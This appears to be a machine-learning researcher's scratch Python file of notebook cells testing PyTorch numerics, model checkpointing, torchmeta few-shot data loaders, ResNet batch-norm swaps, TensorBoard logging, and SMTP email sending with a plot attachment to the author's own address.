import torch.nn as nn
from collections import OrderedDict
Din, Dout = 8, 1
base_model = nn.Sequential(OrderedDict([
('f1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
with torch.no_grad():
for i, w in enumerate(base_model.parameters()):
print(f'--- i = {i}')
print(w)
w += w + 0.001
print(w)
# %%
# pickle vs torch.save
# def log_validation(args, meta_learner, outer_opt, meta_val_set):
# """ Log the validation loss, acc. Checkpoint the model if that flag is on. """
# if args.save_ckpt: # pickle vs torch.save https://discuss.pytorch.org/t/advantages-disadvantages-of-using-pickle-module-to-save-models-vs-torch-save/79016
# # make dir to logs (and ckpts) if not present. Throw no exceptions if it already exists
# path_to_ckpt = args.logger.current_logs_path
# path_to_ckpt.mkdir(parents=True, exist_ok=True) # creates parents if not presents. If it already exists that's ok do nothing and don't throw exceptions.
# ckpt_path_plus_path = path_to_ckpt / Path('db')
#
# args.base_model = "check the meta_learner field in the checkpoint not in the args field" # so that we don't save the child model so many times since it's part of the meta-learner
# # note this obj has the last episode/outer_i we ran
# torch.save({'args': args, 'meta_learner': meta_learner}, ckpt_path_plus_path)
# acc_mean, acc_std, loss_mean, loss_std = meta_eval(args, meta_learner, meta_val_set)
# if acc_mean > args.best_acc:
# args.best_acc, args.loss_of_best = acc_mean, loss_mean
# args.logger.loginfo(
# f"***> Stats of Best Acc model: meta-val loss: {args.loss_of_best} +- {loss_std}, meta-val acc: {args.best_acc} +- {acc_std}")
# return acc_mean, acc_std, loss_mean, loss_std
# %%
import numpy as np
from sklearn.linear_model import LinearRegression
X = np.array([[1, 1], [1, 2], [2, 2], [2, 3]])
# y = 1 * x_0 + 2 * x_1 + 3
y = np.dot(X, np.array([1, 2])) + 3
reg = LinearRegression()
print(reg)
reg = LinearRegression().fit(X, y)
print(reg)
reg.score(X, y)
reg.coef_
reg.intercept_
reg.predict(np.array([[3, 5]]))
# %%
# https://stackoverflow.com/questions/63818676/what-is-the-machine-precision-in-pytorch-and-when-should-one-use-doubles
# https://discuss.pytorch.org/t/how-does-one-start-using-double-without-unexpected-bugs/95715
# https://discuss.pytorch.org/t/what-is-the-machine-precision-of-pytorch-with-cpus-or-gpus/9384
import torch
x1 = torch.tensor(1e-6)
x2 = torch.tensor(1e-7)
x3 = torch.tensor(1e-8)
x4 = torch.tensor(1e-9)
eps = torch.tensor(1e-11)
print(x1.dtype)
print(x1)
print(x1 + eps)
print(x2)
print(x2 + eps)
print(x3)
print(x3 + eps)
print(x4)
print(x4 + eps)
# %%
# python float is a C double
# NumPy's standard numpy.float is the same (so C double), also numpy.float64.
# https://www.doc.ic.ac.uk/~eedwards/compsys/float/
# https://stackoverflow.com/questions/1049722/what-is-2s-complement
# https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
# https://stackoverflow.com/questions/7524838/fixed-point-vs-floating-point-number
# https://en.wikipedia.org/wiki/Single-precision_floating-point_format
# https://www.cs.cornell.edu/~tomf/notes/cps104/twoscomp.html#whyworks
import torch
xf = torch.tensor(1e-7)
xd = torch.tensor(1e-7, dtype=torch.double)
epsf = torch.tensor(1e-11)
print(xf.dtype)
print(xf)
print(xf.item())
print(type(xf.item()))
#
print('\n> test when a+eps = a')
print(xf.dtype)
print(f'xf = {xf}')
print(f'xf + 1e-7 = {xf + 1e-7}')
print(f'xf + 1e-11 = {xf + 1e-11}')
print(f'xf + 1e-8 = {xf + 1e-8}')
print(f'xf + 1e-16 = {xf + 1e-16}')
# after seeing the above it seems that there are errors if things are small
print('\n> test when a+eps = a')
x = torch.tensor(1e-7, dtype=torch.double)
print(f'xf = {x}')
print(f'xf + 1e-7 = {x + 1e-7}')
print(f'xf + 1e-11 = {x + 1e-11}')
print(f'xf + 1e-8 = {x + 1e-8}')
print(f'xf + 1e-16 = {x + 1e-16}')
# using doubles clearly is better but still has some errors
print('\n> test when a+eps = a')
x = torch.tensor(1e-4)
print(f'xf = {x}')
print(f'xf + 1e-7 = {x + 1e-7}')
print(f'xf + 1e-11 = {x + 1e-11}')
print(f'xf + 1e-8 = {x + 1e-8}')
print(f'xf + 1e-16 = {x + 1e-16}')
# %%
# https://pytorch.org/docs/stable/torchvision/models.html
# %%
import torch
print(torch.zeros(2))
m = torch.distributions.MultivariateNormal(torch.zeros(2), torch.eye(2))
x = m.sample()
print(x)
# m = torch.distributions.MultivariateNormal(torch.zeros(1, 3), torch.eye(1, 3))
# mu = m.sample()
# print(mu)
m = torch.distributions.MultivariateNormal(torch.zeros(1, 5), torch.eye(5))
y = m.sample()
print(y)
# %%
from pathlib import Path
from matplotlib import pyplot as plt
import numpy as np
path = Path('~/data/').expanduser()
# x = np.linspace(0, 2*np.pi, 50)
x = np.random.uniform(0, 2 * np.pi, 100)
noise = np.random.normal(0.0, 0.05, 100)
print(noise)
y = np.sin(x) + noise
plt.figure()
plt.scatter(x, y)
plt.ylabel('f(x)')
plt.ylabel('x (raw feature)')
plt.savefig(path / 'test_fig.pdf')
plt.savefig(path / 'test_fig.png')
plt.show()
# %%
from socket import gethostname
from email.message import EmailMessage
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
print(server)
# %%
# MTA (Mail Transfer Agent)
# https://stackoverflow.com/questions/784201/is-there-a-python-mta-mail-transfer-agent
# https://www.quora.com/How-does-one-send-e-mails-from-Python-using-MTA-Mail-Transfer-Agent-rather-than-an-SMTP-library
# https://www.reddit.com/r/learnpython/comments/ixlq81/how_does_one_send_emails_from_python_using_mta/
# Q why can't I just send an email directly?
# Q why do smtp libraries exist
# %%
import smtplib
server = smtplib.SMTP('smtp.intel-research.net', 25)
server.starttls()
print(server)
# %%
# from socket import gethostname
# from email.message import EmailMessage
# import smtplib
#
# server = smtplib.SMTP('smtp.gmail.com', 587)
# server.starttls()
# # not a real email account nor password, its all ok!
# server.login('slurm.miranda@gmail.com', 'dummy123!@#$321')
#
# # craft message
# msg = EmailMessage()
#
# message = f'{message}\nSend from Hostname: {gethostname()}'
# msg.set_content(message)
# msg['Subject'] = subject
# msg['From'] = 'slurm.miranda@gmail.com'
# msg['To'] = destination
# # send msg
# server.send_message(msg)
# %%
# send email with smtp intel
def send_email(message):
from socket import gethostname
import smtplib
hostname = gethostname()
from_address = 'slurm.miranda@gmail.com'
from_address = 'miranda9@intel-research.net.'
# to_address = [ 'iam-alert@intel-research.net']
to_address = ['brando.science@gmail.com']
subject = f"Test msg from: {hostname}"
##
message = f'Test msg from {hostname}: {message}'
full_message = f'From: {from_address}\n' \
f'To: {to_address}\n' \
f'Subject: {subject}\n' \
f'{message}'
server = smtplib.SMTP('smtp.intel-research.net')
server.sendmail(from_address, to_address, full_message)
server.quit()
# sys.exit(1)
print('start')
send_email('HelloWorld')
print('done email test!')
# %%
def send_email2(message):
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from socket import gethostname
import smtplib
server = smtplib.SMTP('smtp.intel-research.net')
# craft message
msg = MIMEMultipart()
message = f'{message}\nSend from Hostname: {gethostname()}'
msg['Subject'] = 'Test email'
msg['From'] = 'miranda9@intel-research.net.'
msg['To'] = 'brando.science@gmail.com'
msg.attach(MIMEText(message, "plain"))
# send message
server.send_message(msg)
# server.sendmail(from_address, to_address, full_message)
server.quit()
print('start')
send_email2('HelloWorld')
print('done email test!')
# %%
from pathlib import Path
message = 'HelloWorld'
path_to_pdf = Path('~/data/test_fig.pdf').expanduser()
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from socket import gethostname
import smtplib
server = smtplib.SMTP('smtp.intel-research.net')
# craft message
msg = MIMEMultipart()
message = f'{message}\nSend from Hostname: {gethostname()}'
msg['Subject'] = 'Test email'
msg['From'] = 'miranda9@intel-research.net.'
msg['To'] = 'brando.science@gmail.com'
msg.attach(MIMEText(message, "plain"))
# attach pdf
if path_to_pdf.exists():
with open(path_to_pdf, "rb") as f:
# attach = email.mime.application.MIMEApplication(f.read(),_subtype="pdf")
attach = MIMEApplication(f.read(), _subtype="pdf")
attach.add_header('Content-Disposition', 'attachment', filename=str(path_to_pdf))
msg.attach(attach)
# send message
server.send_message(msg)
# server.sendmail(from_address, to_address, full_message)
server.quit()
# %%
# Here, we used "w" letter in our argument, which indicates write and will create a file if it does not exist in library
# Plus sign indicates both read and write.
# with open('data.json', 'w+') as f:
# json.dump(self.stats, f)
# %%
import numpy as np
from torch.utils.tensorboard import SummaryWriter # https://deeplizard.com/learn/video/psexxmdrufm
path = Path('~/data/logs/').expanduser()
tb = SummaryWriter(log_dir=path)
# tb = SummaryWriter(log_dir=args.current_logs_path)
for i in range(3):
loss = i + np.random.normal(loc=0, scale=1)
tb.add_scalar('loss', loss, i)
# %%
# https://pytorch.org/tutorials/beginner/saving_loading_models.html
# Saving & Loading Model for Inference
# Save/Load state_dict (Recommended)
# Save:
# torch.save(model.state_dict(), PATH)
#
# # Load:
# model = TheModelClass(*args, **kwargs)
# model.load_state_dict(torch.load(PATH))
# model.eval()
# %%
# Save:
# torch.save({
# 'epoch': epoch,
# 'model_state_dict': model.state_dict(),
# 'optimizer_state_dict': optimizer.state_dict(),
# 'loss': loss,
# ...
# }, PATH)
# # Load:
# model = TheModelClass(*args, **kwargs)
# optimizer = TheOptimizerClass(*args, **kwargs)
#
# checkpoint = torch.load(PATH)
# model.load_state_dict(checkpoint['model_state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# epoch = checkpoint['epoch']
# loss = checkpoint['loss']
#
# model.eval()
# # - or -
# model.train()
# %%
# https://discuss.pytorch.org/t/how-does-load-a-sequential-model-from-a-string/97648
# https://stackoverflow.com/questions/64109883/how-does-one-load-a-sequential-model-from-a-string-in-pytorch
# %%
#
# torch.save({'f': f,
# 'f_state_dict': f.state_dict(),
# 'f_str': str(f),
# 'f_modules': f._modules,
# 'f_modules_str': str(f._modules)
# }, path2avg_f)
# %%
from pathlib import Path
from torch.utils.tensorboard import SummaryWriter
import numpy as np
path = Path('~/data/tb_test/').expanduser()
# path = Path('~/logs/logs_Sep29_12-38-08_jobid_-1/tb').expanduser()
writer = SummaryWriter(path)
for n_iter in range(100):
writer.add_scalar('Loss/train', np.random.random(), n_iter)
writer.add_scalar('Loss/test', np.random.random(), n_iter)
writer.add_scalar('Accuracy/train', np.random.random(), n_iter)
writer.add_scalar('Accuracy/test', np.random.random(), n_iter)
print('done! \a')
# %%
db = torch.load(str(args.resume_ckpt_path))
# args.epchs = db['epoch'] # we can start counting from zero
# args.epoch += 1 # this is needed so that it starts on the next batch since it says the last batch it *did* and range counts with 0 indexing.
# meta_learner = db['meta_learner']
args.base_model = db['f']
# in case loading directly doesn't work
modules = eval(db['f_modules_str'])
args.base_model = torch.nn.Sequential(modules)
f_state_dict = db['f_state_dict']
args.base_model.load_state_dict(f_state_dict)
# %%
# Torch-meta miniImagenet
import torchmeta
from torchmeta.utils.data import BatchMetaDataLoader
from torchmeta.transforms import ClassSplitter
from pathlib import Path
from tqdm import tqdm
data_path = Path('~/data/').expanduser()
meta_split = 'train'
dataset = torchmeta.datasets.MiniImagenet(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
# dataset = torchmeta.datasets.Omniglot(data_path, num_classes_per_task=5, meta_split=meta_split, download=True)
print(f'type(metaset_miniimagenet) = {type(dataset)}')
print(f'len(metaset_miniimagenet) = {len(dataset)}')
shots, test_shots = 5, 15
metaset = ClassSplitter(
dataset,
num_train_per_class=shots,
num_test_per_class=test_shots,
shuffle=True)
batch_size = 16
num_workers = 0
meta_dataloader = BatchMetaDataLoader(metaset, batch_size=batch_size, num_workers=num_workers)
epochs = 2
print(f'batch_size = {batch_size}')
print(f'len(metaset) = {len(metaset)}')
print(f'len(meta_dataloader) = {len(meta_dataloader)}\n')
with tqdm(range(epochs)) as tepochs:
for epoch in tepochs:
print(f'\n[epoch={epoch}]')
for batch_idx, batch in enumerate(meta_dataloader):
print(f'batch_idx = {batch_idx}')
train_inputs, train_targets = batch['train']
test_inputs, test_targets = batch['test']
print(f'train_inputs.shape = {train_inputs.shape}')
print(f'train_targets.shape = {train_targets.shape}')
print(f'test_inputs.shape = {test_inputs.shape}')
print(f'test_targets.shape = {test_targets.shape}')
print()
break
break
# %%
from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
for batch in dataloader:
train_inputs, train_targets = batch["train"]
print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
test_inputs, test_targets = batch["test"]
print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# %%
# replacing a module in in a pytorch model
# https://discuss.pytorch.org/t/how-to-modify-a-pretrained-model/60509/11
import torch
from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
import copy
meta_split = 'train'
data_path = Path('~/data/').expanduser()
dataset = omniglot(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
def replace_bn(module, name):
"""
Recursively put desired batch norm in nn.module module.
set module = net to start code.
"""
# go through all attributes of module nn.module (e.g. network or layer) and put batch norms if present
for attr_str in dir(module):
target_attr = getattr(module, attr_str)
if type(target_attr) == torch.nn.BatchNorm2d:
new_bn = torch.nn.BatchNorm2d(target_attr.num_features, target_attr.eps, target_attr.momentum,
target_attr.affine,
track_running_stats=False)
setattr(module, attr_str, new_bn)
# iterate through immediate child modules. Note, the recursion is done by our code no need to use named_modules()
for name, immediate_child_module in module.named_children():
replace_bn(immediate_child_module, name)
def convert_bn(model):
for module in model.modules():
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
module.__init__(module.num_features, module.eps,
module.momentum, module.affine,
track_running_stats=False)
fc_out_features = 5
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=512, out_features=fc_out_features, bias=True)
#
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet50', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
# model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet101', pretrained=False)
# replace_bn(model, 'model')
# model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet152', pretrained=False)
replace_bn(model, 'model')
model.fc = torch.nn.Linear(in_features=2048, out_features=fc_out_features, bias=True)
for batch in dataloader:
train_inputs, train_targets = batch["train"]
print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
test_inputs, test_targets = batch["test"]
print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
first_meta_batch = train_inputs[0] # task
nk_task = first_meta_batch
out = model(nk_task)
print(f'resnet out.size(): {out.size()}')
break
print('success\a')
# %%
import torch
import torchvision.transforms as transforms
# import torchmeta
# from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data_augmentation_transforms = transforms.Compose([
transforms.RandomResizedCrop(84),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(
brightness=0.4,
contrast=0.4,
saturation=0.4,
hue=0.2),
transforms.ToTensor(),
normalize])
dataset = miniimagenet(data_path,
transform=data_augmentation_transforms,
ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
model = torch.hub.load('pytorch/vision:v0.6.0', 'resnet18', pretrained=False)
print(len(dataloader))
# for batch_idx, batch in enumerate(dataloader):
# print(f'--> batch_idx = {batch_idx}')
# train_inputs, train_targets = batch["train"]
# print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
# print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
# test_inputs, test_targets = batch["test"]
# print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
# print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
# first_meta_batch = train_inputs[0] # task
# nk_task = first_meta_batch
# out = model(nk_task)
# print(f'resnet out.size(): {out.size()}')
# break
print('success\a')
# %%
import torch
import torchvision.transforms as transforms
# import torchmeta
# from torchmeta.datasets.helpers import omniglot
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data_augmentation_transforms = transforms.Compose([
transforms.RandomResizedCrop(84),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(
brightness=0.4,
contrast=0.4,
saturation=0.4,
hue=0.2),
transforms.ToTensor(),
normalize])
dataset = miniimagenet(data_path,
transform=data_augmentation_transforms,
ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'len augmented = {len(dataloader)}')
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'len normal = {len(dataloader)}')
print('success\a')
# %%
import torch
import torchvision.transforms as transforms
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
from tqdm import tqdm
from pathlib import Path
meta_split = 'train'
data_path = Path('~/data/').expanduser()
# normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# data_augmentation_transforms = transforms.Compose([
# transforms.RandomResizedCrop(84),
# transforms.RandomHorizontalFlip(),
# transforms.ColorJitter(
# brightness=0.4,
# contrast=0.4,
# saturation=0.4,
# hue=0.2),
# transforms.ToTensor(),
# normalize])
# dataset = miniimagenet(data_path,
# transform=data_augmentation_transforms,
# ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
# dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
# print(f'len augmented = {len(dataloader)}')
dataset = miniimagenet(data_path, ways=5, shots=5, test_shots=15, meta_split=meta_split, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'len normal = {len(dataloader)}')
num_batches = 10
with tqdm(dataloader, total=num_batches) as pbar:
for batch_idx, batch in enumerate(pbar):
train_inputs, train_targets = batch["train"]
print(train_inputs.size())
# print(batch_idx)
if batch_idx >= num_batches:
break
print('success\a')
# %%
from math import comb
total_classes = 64
n = 5
number_tasks = comb(total_classes, n)
print(number_tasks)
# %%
# saving a json file save json file
# human readable pretty print https://stackoverflow.com/questions/12943819/how-to-prettyprint-a-json-file
import json
data = 'data string'
with open('data.txt', 'w') as outfile:
json.dump(data, outfile)
# json.dump(data, open('data.txt', 'w'))
# with open(current_logs_path / 'experiment_stats.json', 'w+') as f:
# json.dump(self.stats, f)
# data_ars = {key:value for (key,value) in dictonary.items()}
# x = {key:str(value) fo# %%
#
# # to test impots
# import sys
#
# for path in sys.path:
# print(path)
# # %%
#
# import time
#
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.INFO)
#
# formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')
#
# file_handler = logging.FileHandler('employee.log')
# file_handler.setFormatter(formatter)
#
# logger.addHandler(file_handler)
#
#
# class Employee:
# """A sample Employee class"""
#
# def __init__(self, first, last):
# self.first = first
# self.last = last
#
# logger.info('Created Employee: {} - {}'.format(self.fullname, self.email))
#
# @property
# def email(self):
# return '{}.{}@email.com'.format(self.first, self.last)
#
# @property
# def fullname(self):
# return '{} {}'.format(self.first, self.last)
#
#
# emp_1 = Employee('John', 'Smith')
# emp_2 = Employee('Corey', 'Schafer')
# emp_3 = Employee('Jane', 'Doe')
#
#
# ######## END OF EMPLOYEE LOGGING EXAMPLE
#
# def report_times(start, verbose=False):
# '''
# How much time has passed since the time "start"
#
# :param float start: the number representing start (usually time.time())
# '''
# meta_str = ''
# ## REPORT TIMES
# start_time = start
# seconds = (time.time() - start_time)
# minutes = seconds / 60
# hours = minutes / 60
# if verbose:
# print(f"--- {seconds} {'seconds ' + meta_str} ---")
# print(f"--- {minutes} {'minutes ' + meta_str} ---")
# print(f"--- {hours} {'hours ' + meta_str} ---")
# print('\a')
# ##
# msg = f'time passed: hours:{hours}, minutes={minutes}, seconds={seconds}'
# return msg, seconds, minutes, hours
#
#
# def params_in_comp_graph():
# import torch
# import torch.nn as nn
# from torchviz import make_dot
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# # x.requires_grad = True # uncomment to put in computation graph
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l, params=dict(mdl.named_parameters()))
# params = dict(mdl.named_parameters())
# # params = {**params, 'x':x}
# make_dot(l, params=params).render('data/debug/test_img_l', format='png')
#
#
# def check_if_tensor_is_detached():
# a = torch.tensor([2.0], requires_grad=True)
# b = a.detach()
# b.requires_grad = True
# print(a == b)
# print(a is b)
# print(a)
# print(b)
#
# la = (5.0 - a) ** 2
# la.backward()
# print(f'a.grad = {a.grad}')
#
# lb = (6.0 - b) ** 2
# lb.backward()
# print(f'b.grad = {b.grad}')
#
#
# def deep_copy_issue():
# params = OrderedDict([('fc1', nn.Linear(in_features=3, out_features=1))])
# mdl0 = nn.Sequential(params)
# mdl1 = copy.deepcopy(mdl0)
# print(id(mdl0))
# print(mdl0)
# print(id(mdl1))
# print(mdl1)
# # my update
# mdl1.fc1.weight = nn.Parameter(mdl1.fc1.weight + 1)
# mdl2 = copy.deepcopy(mdl1)
# print(id(mdl2))
# print(mdl2)
#
#
# def download_mini_imagenet():
# # download mini-imagenet automatically
# import torch
# import torch.nn as nn
# import torchvision.datasets.utils as utils
# from torchvision.datasets.utils import download_and_extract_archive
# from torchvision.datasets.utils import download_file_from_google_drive
#
# ## download mini-imagenet
# # url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# filename = 'miniImagenet.tgz'
# root = '~/tmp/' # dir to place downloaded file in
# download_file_from_google_drive(file_id, root, filename)
#
#
# def extract():
# from torchvision.datasets.utils import extract_archive
# from_path = os.path.expanduser('~/Downloads/miniImagenet.tgz')
# extract_archive(from_path)
#
#
# def download_and_extract_miniImagenet(root):
# import os
# from torchvision.datasets.utils import download_file_from_google_drive, extract_archive
#
# ## download miniImagenet
# # url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# filename = 'miniImagenet.tgz'
# download_file_from_google_drive(file_id, root, filename)
# fpath = os.path.join(root, filename) # this is what download_file_from_google_drive does
# ## extract downloaded dataset
# from_path = os.path.expanduser(fpath)
# extract_archive(from_path)
# ## remove the zip file
# os.remove(from_path)
#
#
# def torch_concat():
# import torch
#
# g1 = torch.randn(3, 3)
# g2 = torch.randn(3, 3)
#
#
# def inner_loop1():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# qry_loss.backward()
#
# meta_opt.step()
# qry_losses = sum(qry_losses) / task_num
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
#
#
# def inner_loop2():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# meta_loss = 0
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# # qry_loss.backward()
# meta_loss += qry_loss
#
# qry_losses = sum(qry_losses) / task_num
# qry_losses.backward()
# meta_opt.step()
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
#
#
# def error_unexpected_way_to_by_pass_safety():
# # https://stackoverflow.com/questions/62415251/why-am-i-able-to-change-the-value-of-a-tensor-without-the-computation-graph-know
#
# import torch
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# # are detached tensor's leafs? yes they are
# a_detached = a.detach()
# # a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
# a_detached.fill_(
# 2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
# print(f'a = {a}')
# print(f'a_detached = {a_detached}')
# a.sum().backward()
#
#
# def detach_playground():
# import torch
#
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# # are detached tensor's leafs? yes they are
# a_detached = a.detach()
# print(f'a_detached.is_leaf = {a_detached.is_leaf}')
# # is doing sum on the detached tensor a leaf? no
# a_detached_sum = a.sum()
# print(f'a_detached_sum.is_leaf = {a_detached_sum.is_leaf}')
# # is detaching an intermediate tensor a leaf? yes
# a_sum_detached = a.sum().detach()
# print(f'a_sum_detached.is_leaf = {a_sum_detached.is_leaf}')
# # shows they share they same data
# print(f'a == a_detached = {a == a_detached}')
# print(f'a is a_detached = {a is a_detached}')
# a_detached.zero_()
# print(f'a = {a}')
# print(f'a_detached = {a_detached}')
# # a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
# a_detached.fill_(
# 2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
# print(f'a = {a}')
# print(f'a_detached = {a_detached}')
# ## conclusion: detach basically creates a totally new tensor which cuts gradient computations to the original but shares the same memory with original
# out = a.sigmoid()
# out_detached = out.detach()
# out_detached.zero_()
# out.sum().backward()
#
#
# def clone_playground():
# import torch
#
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# a_clone = a.clone()
# print(f'a_clone.is_leaf = {a_clone.is_leaf}')
# print(f'a is a_clone = {a is a_clone}')
# print(f'a == a_clone = {a == a_clone}')
# print(f'a = {a}')
# print(f'a_clone = {a_clone}')
# # a_clone.fill_(2)
# a_clone.mul_(2)
# print(f'a = {a}')
# print(f'a_clone = {a_clone}')
# a_clone.sum().backward()
# print(f'a.grad = {a.grad}')
#
#
# def clone_vs_deepcopy():
# import copy
# import torch
#
# x = torch.tensor([1, 2, 3.])
# x_clone = x.clone()
# x_deep_copy = copy.deepcopy(x)
# #
# x.mul_(-1)
# print(f'x = {x}')
# print(f'x_clone = {x_clone}')
# print(f'x_deep_copy = {x_deep_copy}')
# print()
#
#
# def inplace_playground():
# import torch
#
# x = torch.tensor([1, 2, 3.], requires_grad=True)
# y = x + 1
# print(f'x.is_leaf = {x.is_leaf}')
# print(f'y.is_leaf = {y.is_leaf}')
